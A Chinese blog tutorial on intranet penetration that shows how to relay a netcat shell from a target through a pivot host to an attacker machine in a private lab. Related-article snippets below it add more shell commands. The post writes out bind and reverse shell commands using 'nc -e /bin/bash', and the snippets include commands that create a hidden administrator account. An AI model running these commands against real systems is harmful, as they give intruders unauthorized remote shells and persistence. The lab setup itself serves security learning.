内网渗透----netcat工具使用

最新推荐文章于 2023-12-21 14:55:23 发布
最新推荐文章于 2023-12-21 14:55:23 发布
阅读量518 收藏 1
点赞数
分类专栏: 内网渗透 工具 文章标签: netcat 网络安全 渗透测试 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32731075/article/details/118093321
版权

内网渗透----netcat工具使用

一、环境准备

1.1 设备准备

这把我们直接点,使用nc进行端口转发,我们需要三台设备

  • 靶机,ip: 192.168.248.144
  • 跳板机,ip:192.168.248.142
  • 攻击机,ip:192.168.248.201

1.2 软件准备

网上一大把,或者直接用三台kali就好了,自带nc

二、使用方法

靶机上执行

nc -lvp 4444 -e /bin/bash

将自己的bash转发到自己的4444端口,等待别人来链接

攻击机上执行

nc -lvp 8888

监听8888端口,等待跳板机来连接

跳板机上执行

nc -v 192.168.248.201 8888 -e "nv -v 192.168.248.144 4444"

获取靶机的bash,然后转发给攻击机的8888端口

讲真的,这个理论应该没有一点问题,但是,我实验的过程中失败了,将每个步骤拆开来都能成功,但是,放在一起在跳板机连接攻击机的时候必定失败!!欢迎留言告知!!

Iwanturoot
关注
专栏目录
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1757
内网渗透-Linux内网渗透
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2454
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
渗透基础工具netcat使用
m0_48449635的博客
01-20 118
nc是netcat的简写,有着网络界的瑞士军刀美誉。该工具简单直接,素有此荣誉称号。
渗透测试工具--NetCat使用
dreamer_96的博客
03-04 4871
渗透测试工具--NetCat使用什么是NetCatNetCat的作用用法常用选项 什么是NetCat 在网络工具中有“瑞士军刀”美誉的NetCat,首次出现在1995年。NetCat其实是一个非常简单的Unix工具,他的实际可运行的名字叫nc。非常棒的是,NetCat可以与其他工具结合和重定向,因此,可以说它是互联网里短小精悍的多功能工具NetCat的作用 聊天工具 端口扫描 远程控制 文件传输 telnet/获取banner信息 手动连接网络服务 用法 nc属于kali自带工具,位置如下: ┌─
SSH和Netcat完成临时内网穿透
orangleliu 笔记本
03-20 2879
场景是这样的,前几天问运维同学要了一个测试机,只有内网IP,大部分情况够用,但是呢,偶尔也需要看看web页面什么的,怎么解决呢,正好我有个VPS,所以就想用SSH做个反向隧道,可以在家里也能访问到测试机的web服务,大部分都是临时使用,用完就关闭就好,安全风险也不是很大。 连接互联网的电脑 ---> 公网IP(vps) <--ssh隧道--> 内网测试机 解决方案...
网络安全工具nc(NetCat)
weixin_33834137的博客
10-15 216
NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的 网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。 首先我们要弄明白netcat的工作原理...
端口转发netcat(nc)
02-12
端口转发工具 内网渗透 netcat(nc) 端口转发工具 内网渗透 netcat(nc)
内网渗透--远程桌面
qq_31065143的博客
04-29 721
内网渗透–远程桌面 前言 学代码审计有些枯燥,加上俺内网啥也不会,学学内网换换口味。 隐藏用户的创建 因为在Windows环境下创建用户后面如果带入一个“$"符号,在net user时默认是不显示的。 利用条件:获得管理员权限 首先在cs中输入以下命令 shell net user admin$ 123456 /add shell net localgroup administrators admin$ /add 第一句是创建一个admin$用户密码为123456.第二句是将用户加入管理组。 我们
内网渗透-信息收集
MSB_WLAQ的博客
11-30 664
00 信息收集的方向 主机存活探测 主机端口开放情况 主机服务探测 主机操作系统探测 网段分布情况 漏洞信息探测 主机内部信息搜集 / 域内信息搜集 01 主机内部信息收集 操作系统默认 ttl 值 ① WINDOWS NT/2000 TTL:128 ② WINDOWS 95/98 TTL:32 ③ UNIX TTL:255 ④ LINUX TTL:64 ⑤ WIN7
内网渗透--linux提权
hee_mee的博客
07-28 534
zeroNIl
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
最新发布
aming小老弟
12-21 1339
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
如何利用Netcat进行黑客攻击第1部分:基础知识
tigerOrtiger的博客
07-13 910
使用Netcat进行黑客攻击第1部分:基础知识 注: 本文章为翻译文章,文章的原地址在末尾。本来是想自己写一些关于netcat使用,在google中发现了这篇文章。于是便用本人拙劣的英文水平翻译过来,方便各位大佬查阅,当然,里边还会有我自己一些小私货。 那么开始吧^_ ^ Netcat是一个很棒的网络实用程序,用于使用TCP和UDP协议读写网络连接。在网络工具中,Netcat通常被称为“瑞士军刀”,有时也成为nc, 我们将在有关Hacking Tutorials的不同教程中大量使用Netcat。Net
【网安神器篇】——瑞士军刀Netcat
热门推荐
Demo不是emo的博客
11-05 1万+
今天给大家分享的网络安全神器是网安界的瑞士军刀——Netcat
netcat tcp/udp调试工具安装与应用
weixin_38387929的博客
08-27 518
1.下载安装包 wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz 2.解压缩文件 tar -zxvf netcat-0.7.1.tar.gz -C /usr/local 3.切换至/usr/local/netcat-0.7.1 查看编译配置文件 ./configure 编译安装 make && make install 4.使用 [root@centos ~]# ne
一些简单的局域网入侵命令
u013444147的博客
07-09 2740
(与远程主机建立空管连接) net use \\IP地址\ipc$ " " /use:" " (以管理员身份登录远程主机) net use \\IP地址\ipc$ " 密码" /use:" Administrator" (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ (查看远程主机时间) net time \\IP地址 ...
内网渗透-端口转发隧道技术
weixin_60329395的博客
08-02 2216
代理和隧道技术区别、代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现、隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系统。(封装协议)
netcat使用
weixin_30784141的博客
04-17 675
前言 最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助! Netcat简介 Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话...
十大hack工具
贞正
01-09 5416
十大hack工具 转自http://roclinux.cn/?p=1645 一、Nessus:这是一款UNIX平台的漏洞评估工具,可以说它是最好的、免费的网络漏洞扫描程序.其更新速度很快,有超过11000个插件.其关键特性包括安全和本地的安全检查,拥有GTK图形接口的客户端/服务器体系结构,还有一个嵌入式脚本语言(可以编写我们自己的插件或理解现有的插件).Nessus 3现在是闭源
内网代理穿透
huangyongkang666的博客
03-31 2965
内网代理穿透 实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要介绍Termite对模拟内网进行操作,Termite 是EW(EarthWorm)的最新版 1.nc工具使用 windows中使用nc,需要安装nc.exe 靶机 nc.exe -l -p 4444 -t -e cmd.exe 攻击机 nc.exe 192.168.1.1 4444 linux使用nc,见工具使用栏中的netcat使用博客 2.termite使用 ​ 一款极度小巧灵活的跳板
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值